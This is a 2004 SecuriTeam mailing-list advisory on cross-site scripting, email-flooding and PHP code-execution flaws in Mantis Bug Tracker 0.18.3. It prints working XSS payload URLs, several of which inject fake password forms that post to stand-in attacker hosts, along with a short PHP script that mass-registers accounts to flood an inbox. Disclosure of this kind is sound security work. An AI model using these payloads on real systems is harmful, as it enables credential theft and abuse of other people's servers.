[UNIX] Mantis Bug Tracker Multiple Vulnerabilities

From: SecuriTeam (support_at_securiteam.com)
Date: 08/22/04

  • Next message: SecuriTeam: "[UNIX] MyDMS SQL Injection and Directory Traversal Vulnerabilities" 
    To: list@securiteam.com
Date: 22 Aug 2004 17:24:17 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Mantis Bug Tracker Multiple Vulnerabilities
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.mantisbt.org/> Mantis is "a web-based bug tracking system. It
    is written in the PHP scripting language and requires the MySQL database
    and a web server".

    The Mantis bug tracking system suffers from multiple security issues
    mainly due to improper input validation. Hence, cross-site scripting and
    even PHP code execution are possible through this system.

    DETAILS

    Vulnerable Systems:
     * Mantis version 0.18.3

    Immune Systems:
     * Mantis version 0.19.0a2 (Alpha) from CVS

     * The 'return' parameter in the login_page.php script are not properly
    sanitized and allow a malicious user to input malicious content. It is
    possible to login anonymously and in order to perform a privileged action,
    login as a registered user. The previous URL is passed as the return
    parameter and through it, any HTML or script code can be injected. An
    example for the XSS vulnerability:
    http://>/login_page.php?return=%22%3E%3Ch1%3EHello!%3C/h1%3E%3Cform action=%22http://malicious.site.com/script.xxx%22%3EPlease type your password : %3Cinput type=%22password%22 name=%22your_password%22%3E%3Cbr%3E%3Cinput type=%22submit%22 value=%22Give me your password, please...%22%3E%3C/form%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E
    %3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E
    %3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr

     * Another XSS vulnerability can be found in the signup.php script (ex.:
    <http://bugs.mantisbt.org/signup.php>
    http://bugs.mantisbt.org/signup.php). The Email address field is not
    properly sanitized and will allow dangerous content to be passed. One can
    put the following into the Email address:
    <iframe src=http://www.playboy.com></iframe> or <h1>Hi!</h1>

     * The 'Select Project' script is also vulnerable to a cross site
    scripting attack. The script is 'login_select_proj_page.php' and the
    following URL can be used to demonstrate and exploit this issue:
    http://>/login_select_proj_page.php?ref=%3Cbr%3E%3Cform action=%22http://my.fucking.site/xxx.sss%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3EUsername:%3C/td%3E%3Ctd%3E%3Cinput type=text name=user%3E%3C/tr%3E%3Ctr%3E%3Ctd%3EPassword:%3C/td%3E%3Ctd%3E%3Cinput type=password name=pass%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd colspan=2%3E%3Cinput type=submit value=%22login%22 onclick=%22javascript:alert('hi')%22%3E%3C/td%3E%3C/tr%3E%3C/form%3E

     * Cross site scripting vulnerability in the 'view_all_set.php', example
    given below:
    http://>/view_all_set.php?type=1&reporter_id=5031&hide_status=80<script>alert('hi')</script>

    In addition to the multiple cross-site scripting vulnerabilities, it is
    also possible to exploit the product and cause it to send a fairly
    arbitrary (and large) amount of emails to a user.

    Exploit:
    The following script can be used to determine whether your system is
    vulnerable to attack or not:
    <?php

    //Please, change it becuase is my e-mail :)
    $email = "anyemail@address";
    $base_user = "test";
    $i = 0;
    $site = "    http://";

    for ($i=0;$i<=15;$i++)
    {
     echo("Sending e-mail number $i\n");
     $user = "$base_user$i";
     echo("New user is $user\n");
     $url = "    http://$site/signup.php?username=$user&email=$email";
     echo("URL is $url\n");
     $fd = fopen($url,"r");
     echo("E-mail $i sended\n");
     fclose($fd);
    }

    ?>

    Finally, there is also a remote PHP code execution in the system. If the
    REGISTER_GLOBAL variable is set, an attacker is able to inject and execute
    PHP code by overwriting the $t_core_dir global variable. The vulnerable
    scripts are:
    bug_api.php -> at line 22 (using variable $t_core_path)
    relationship_api.php -> Line 14 (using variable $t_core_dir)

    Vendor Status:
    The maintainers of Mantis have been informed and the fixes are already in
    the CVS tree, in the alpha version.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:joxeankoret@yahoo.es> Joxean
    Koret.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[UNIX] MyDMS SQL Injection and Directory Traversal Vulnerabilities"